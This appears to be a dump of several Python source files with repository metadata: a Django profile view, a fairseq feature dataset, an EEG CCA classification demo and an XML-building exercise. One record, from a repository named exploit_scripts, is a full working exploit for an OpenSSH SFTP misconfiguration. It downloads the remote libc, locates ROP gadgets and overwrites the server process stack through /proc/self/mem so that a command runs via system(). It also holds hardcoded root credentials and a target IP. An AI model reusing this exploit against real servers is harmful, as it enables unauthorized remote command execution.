print(list) | [
"[email protected]"
]
| |
150ef124e051307e4b1000fb4c14a1e6dd8b7691 | 3e44021a7b0c8753e5bb788897358573c21b34db | /apps/users/views.py | c18eb86f906f6002b0f896bae68afd84bb125702 | []
| no_license | DrMartiner/food_diary | e3d07c766aa4c65a9f3fcd6861cade9169442380 | ed5dca3a418247737c2bddbce16a52157cdb16eb | refs/heads/master | 2021-01-01T06:50:34.694745 | 2013-11-23T09:18:41 | 2013-11-23T09:18:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 151 | py | # -*- coding: utf-8 -*-
from django.views.generic import TemplateView
class MyProfileView(TemplateView):
template_name = 'users/my_profile.html' | [
"[email protected]"
]
| |
85abd7c55bb2a7aeaba405f4803e34ff03e22faf | 94012eacfd1661185dc78886b912a540dab8085a | /openssh/cve_2014_1692.py | 2be9968388b46486816df43baed506b75c7c25c1 | []
| no_license | sshayb/exploit_scripts | 41dc72095a27c5eb0f1370014cfb6bbcf8890e82 | 07755b2c0428187b7cb5f82bca8616735af86b32 | refs/heads/master | 2023-01-02T00:19:30.048200 | 2020-10-26T01:29:12 | 2020-10-26T01:29:12 | 227,637,487 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,627 | py | # OpenSSH <= 6.6 SFTP misconfiguration exploit for 32/64bit Linux
# The original discovery by Jann Horn: http://seclists.org/fulldisclosure/2014/Oct/35
#
# Adam Simuntis :: https://twitter.com/adamsimuntis
# Mindaugas Slusnys :: https://twitter.com/mislusnys
import paramiko
import sys
import time
#from pwn import *
# parameters
cmd = 'whoami'
host = '10.90.78.29'
port = 22
username = 'root'
password = 'secforce'
# connection
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(hostname = host, port = port, username = username, password = password)
sftp = ssh.open_sftp()
# parse /proc/self/maps to get addresses
log.info("Analysing /proc/self/maps on remote system")
sftp.get('/proc/self/maps','maps')
with open("maps","r") as f:
lines = f.readlines()
for line in lines:
words = line.split()
addr = words[0]
if ("libc" in line and "r-xp" in line):
path = words[-1]
addr = addr.split('-')
BITS = 64 if len(addr[0]) > 8 else 32
print "[+] {}bit libc mapped @ {}-{}, path: {}".format(BITS, addr[0], addr[1], path)
libc_base = int(addr[0], 16)
libc_path = path
if ("[stack]" in line):
addr = addr.split("-")
saddr_start = int(addr[0], 16)
saddr_end = int(addr[1], 16)
print "[+] Stack mapped @ {}-{}".format(addr[0], addr[1])
# download remote libc and extract information
print "[+] Fetching libc from remote system..\n"
sftp.get(str(libc_path), 'libc.so')
e = ELF("libc.so")
sys_addr = libc_base + e.symbols['system']
exit_addr = libc_base + e.symbols['exit']
# gadgets for the RET slide and system()
if BITS == 64:
pop_rdi_ret = libc_base + next(e.search('\x5f\xc3'))
ret_addr = pop_rdi_ret + 1
else:
ret_addr = libc_base + next(e.search('\xc3'))
print "\n[+] system() @ {}".format(hex(sys_addr))
print "[+] 'ret' @ {}".format(hex(ret_addr))
if BITS == 64:
print "[+] 'pop rdi; ret' @ {}\n".format(hex(pop_rdi_ret))
with sftp.open('/proc/self/mem','rw') as f:
if f.writable():
print "[+] We have r/w permissions for /proc/self/mem! All Good."
else:
print "[-] Fatal error. No r/w permission for mem."
sys.exit(0)
log.info("Patching /proc/self/mem on the remote system")
stack_size = saddr_end - saddr_start
new_stack = ""
print "[+] Pushing new stack to {}.. fingers crossed ;))".format(hex(saddr_start))
#sleep(20)
if BITS == 32:
new_stack += p32(ret_addr) * (stack_size/4)
new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-12]
new_stack += p32(sys_addr)
new_stack += p32(exit_addr)
new_stack += p32(saddr_start)
else:
new_stack += p64(ret_addr) * (stack_size/8)
new_stack = cmd + "\x00" + new_stack[len(cmd)+1:-32]
new_stack += p64(pop_rdi_ret)
new_stack += p64(saddr_start)
new_stack += p64(sys_addr)
new_stack += p64(exit_addr)
# debug info
with open("fake_stack","w") as lg:
lg.write(new_stack)
# write cmd to top off the stack
f.seek(saddr_start)
f.write(cmd + "\x00")
# write the rest from bottom up, we're going to crash at some point
for off in range(stack_size - 32000, 0, -32000):
cur_addr = saddr_start + off
try:
f.seek(cur_addr)
f.write(new_stack[off:off+32000])
except:
print "Stack write failed - that's probably good!"
print "Check if you command was executed..."
sys.exit(0)
sftp.close()
ssh.close()
| [
"[email protected]"
]
| |
09afd1ec9f2a9c10b008d929da2e7cdaf0b635c1 | fb1e852da0a026fb59c8cb24aeb40e62005501f1 | /edgelm/examples/wav2vec/unsupervised/data/extracted_features_dataset.py | de470ddc318a5b817f42a7a595ab91eef4ded58e | [
"LGPL-2.1-or-later",
"LicenseRef-scancode-free-unknown",
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference",
"MIT"
]
| permissive | microsoft/unilm | 134aa44867c5ed36222220d3f4fd9616d02db573 | b60c741f746877293bb85eed6806736fc8fa0ffd | refs/heads/master | 2023-08-31T04:09:05.779071 | 2023-08-29T14:07:57 | 2023-08-29T14:07:57 | 198,350,484 | 15,313 | 2,192 | MIT | 2023-08-19T11:33:20 | 2019-07-23T04:15:28 | Python | UTF-8 | Python | false | false | 4,314 | py | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import logging
import os
import contextlib
import numpy as np
import torch
from fairseq.data import FairseqDataset, data_utils
logger = logging.getLogger(__name__)
class ExtractedFeaturesDataset(FairseqDataset):
    """Dataset over pre-extracted feature frames stored as one flat,
    memory-mapped ``<split>.npy`` matrix plus a ``<split>.lengths`` sidecar
    file giving the number of rows belonging to each utterance.

    Optional per-utterance labels are read from ``<split>.<labels>`` and
    encoded with ``label_dict``.  Utterances shorter than ``min_length`` or
    longer than ``max_length`` are dropped.
    """

    def __init__(
        self,
        path,
        split,
        min_length=3,
        max_length=None,
        labels=None,
        label_dict=None,
        shuffle=True,
        sort_by_length=True,
    ):
        super().__init__()

        self.min_length = min_length
        self.max_length = max_length
        self.shuffle = shuffle
        self.sort_by_length = sort_by_length
        self.label_dict = label_dict

        if labels is not None:
            assert label_dict is not None

        self.sizes = []
        self.offsets = []
        self.labels = []

        path = os.path.join(path, split)
        data_path = path
        # mmap keeps the (potentially very large) feature matrix on disk.
        self.data = np.load(data_path + ".npy", mmap_mode="r")
        offset = 0
        skipped = 0

        # Fall back to unlabeled mode when the label file does not exist.
        if not os.path.exists(path + f".{labels}"):
            labels = None

        with open(data_path + ".lengths", "r") as len_f, open(
            path + f".{labels}", "r"
        ) if labels is not None else contextlib.ExitStack() as lbl_f:
            for line in len_f:
                length = int(line.rstrip())
                lbl = None if labels is None else next(lbl_f).rstrip().split()
                if length >= min_length and (
                    max_length is None or length <= max_length
                ):
                    self.sizes.append(length)
                    self.offsets.append(offset)
                    if lbl is not None:
                        self.labels.append(lbl)
                else:
                    # Bug fix: "skipped" was declared and logged but never
                    # incremented, so the log always reported 0 skipped.
                    skipped += 1
                offset += length

        self.sizes = np.asarray(self.sizes)
        self.offsets = np.asarray(self.offsets)

        logger.info(f"loaded {len(self.offsets)}, skipped {skipped} samples")

    def __getitem__(self, index):
        """Return a dict with 'id', 'features' (float tensor) and, when
        labels were loaded, an encoded 'target'."""
        offset = self.offsets[index]
        end = self.sizes[index] + offset
        # .copy() detaches the slice from the mmap before torch wraps it.
        feats = torch.from_numpy(self.data[offset:end].copy()).float()

        res = {"id": index, "features": feats}
        if len(self.labels) > 0:
            res["target"] = self.label_dict.encode_line(
                self.labels[index],
                line_tokenizer=lambda x: x,
                append_eos=False,
            )

        return res

    def __len__(self):
        return len(self.sizes)

    def collater(self, samples):
        """Pad samples to the longest one and stack them into a mini-batch;
        True entries of ``padding_mask`` mark padded frames."""
        if len(samples) == 0:
            return {}

        features = [s["features"] for s in samples]
        sizes = [len(s) for s in features]

        target_size = max(sizes)

        collated_features = features[0].new_zeros(
            len(features), target_size, features[0].size(-1)
        )
        padding_mask = torch.BoolTensor(collated_features.shape[:-1]).fill_(False)
        for i, (f, size) in enumerate(zip(features, sizes)):
            collated_features[i, :size] = f
            padding_mask[i, size:] = True

        res = {
            "id": torch.LongTensor([s["id"] for s in samples]),
            "net_input": {"features": collated_features, "padding_mask": padding_mask},
        }
        if len(self.labels) > 0:
            target = data_utils.collate_tokens(
                [s["target"] for s in samples],
                pad_idx=self.label_dict.pad(),
                left_pad=False,
            )
            res["target"] = target
        return res

    def num_tokens(self, index):
        return self.size(index)

    def size(self, index):
        return self.sizes[index]

    def ordered_indices(self):
        """Return an ordered list of indices. Batches will be constructed based
        on this order."""
        if self.shuffle:
            order = [np.random.permutation(len(self))]
        else:
            order = [np.arange(len(self))]

        if self.sort_by_length:
            # Secondary sort by size (descending) for efficient batching.
            order.append(self.sizes)
            return np.lexsort(order)[::-1]
        else:
            return order[0]
| [
"tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net"
]
| tage@sandbox12.t0ekrjpotp2uhbmhwy0wiwkeya.xx.internal.cloudapp.net |
d4839e5d1454adf699dbf34d35ca809c5556285a | 9d13010b35a14c7c9ba55e704c76777f3f380885 | /demo1_sigpro_old.py | 3cff8956f97cf7dfd5507344169e3653f5c95022 | []
| no_license | trzp/BCIpf | 20e5732025bd604c67001c6dc65b479686187646 | fc4d1262b3e286bfde046fbfe5f71f73e6fa4395 | refs/heads/master | 2020-07-26T18:32:04.473503 | 2020-07-23T14:14:45 | 2020-07-23T14:14:45 | 208,733,546 | 1 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,587 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/18 9:52
# @Version : 1.0
# @File : demo1_sigpro.py
# @Author : Jingsheng Tang
# @Version : 1.0
# @Contact : [email protected] [email protected]
# @License : (C) All Rights Reserved
from sigpro import SigPro
from sigpro import DefaultCoder
from scipy import signal as scipy_signal
import json
from cca import *
import time
class SigProApp(SigPro):
    """SSVEP signal-processing demo.

    Buffers incoming EEG between a start marker (process value 1) and a stop
    marker (process value 2), band-pass filters the buffered signal and
    classifies the attended stimulus frequency with CCA against sin/cos
    reference templates.
    """

    def __init__(self, configs_path='./config.js'):
        super(SigProApp, self).__init__(configs_path)
        self.CODER = DefaultCoder()
        self.data = []          # EEG chunks buffered while accdata is True
        self.accdata = False    # True while accumulating data
        self.calres = False     # True when a result should be computed

        with open(configs_path, 'r') as f:
            self.configs = json.loads(f.read())

        # Design a Chebyshev type-I band-pass filter (~5-45 Hz pass band,
        # 4 dB pass-band ripple spec, 20 dB stop-band attenuation spec).
        Fs = self.configs['signal_processing']['samplingrate']
        fs = Fs / 2
        Wp = [5 / fs, 45 / fs]
        Ws = [3 / fs, 48 / fs]
        [N, Wn] = scipy_signal.cheb1ord(Wp, Ws, 4, 20)
        [self.f_b, self.f_a] = scipy_signal.cheby1(N, 0.5, Wn, btype='bandpass')

        # CCA reference templates: sin/cos at the fundamental and second
        # harmonic for each candidate stimulus frequency, 20 s long at Fs.
        self.ff = [8, 9, 11, 12]
        t = np.arange(0, 20, 1. / Fs)
        self.sx = []
        for f in self.ff:
            x1 = np.mat(np.sin(2 * np.pi * f * t))
            x2 = np.mat(np.cos(2 * np.pi * f * t))
            x3 = np.mat(np.sin(4 * np.pi * f * t))
            x4 = np.mat(np.cos(4 * np.pi * f * t))
            x = np.vstack([x1, x2, x3, x4])
            self.sx.append(x)

    def process(self, eeg, marker):
        """Consume one EEG chunk plus any control markers.

        Returns 1 when a new classification result was produced (stored in
        self.RESULT), otherwise 0.
        """
        if len(marker) > 0:
            print(marker)
            if marker['process']['value'][0] == 1:      # start accumulating
                self.accdata = True
            elif marker['process']['value'][0] == 2:    # stop & classify
                self.calres = True
                self.accdata = False
            else:
                pass

        if self.accdata:
            self.data.append(eeg)

        if self.calres:
            # Bug fix: time.clock() was removed in Python 3.8; use the
            # monotonic high-resolution timer instead.
            fff = time.perf_counter()
            if len(self.data) == 0:
                return 0
            dd = np.hstack(self.data)
            datafilt = scipy_signal.filtfilt(self.f_b, self.f_a, dd)  # band-pass filter
            ll = datafilt.shape[1]
            relate = []
            for x in self.sx:
                # Keep best canonical correlation per template frequency.
                a, b, r = cca(x[:, :ll], datafilt)
                relate.append(np.max(r))
            indx = np.argmax(relate)
            self.RESULT = self.ff[indx]
            print(self.RESULT)
            self.data = []
            self.calres = False
            print(time.perf_counter() - fff, '??')
            return 1
        return 0
def main():
    """Entry point: construct the signal-processing app and run its loop."""
    app = SigProApp()
    app.start_run()


if __name__ == '__main__':
    main()
| [
"[email protected]"
]
| |
bbb0735de098f944fb96c589c586fb888bcbabb4 | ba2dbc19e899faaa17b994a1224e455a3de5b9ad | /02 Data Science/1. Collection/1. Format_practice/1. XML/329_3.py | 69ae0e4d1d52868338c053f454ecd5cd50dd8f66 | []
| no_license | xsky21/bigdata2019 | 52d3dc9379a05ba794c53a28284de2168d0fc366 | 19464a6f8862b6e6e3d4e452e0dab85bdd954e40 | refs/heads/master | 2020-04-21T10:56:34.637812 | 2019-04-16T04:16:27 | 2019-04-16T04:16:27 | 169,503,618 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | from xml.etree.ElementTree import Element,dump,SubElement
# Build a small XML tree:
#   <note date="20120104"><to>Tove</to><from_tag>Jani</from_tag></note>
# Passing date= as a keyword argument gives the same result as adding the
# attribute through attrib.
note = Element('note', date="20120104")

# Child node <to>: SubElement both creates the element and attaches it to
# the parent in one step.
to = SubElement(note, 'to')
to.text = "Tove"

from_tag = SubElement(note, "from_tag")
from_tag.text = "Jani"

# Print the serialized tree to stdout for inspection.
dump(note)
| [
"[email protected]"
]
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.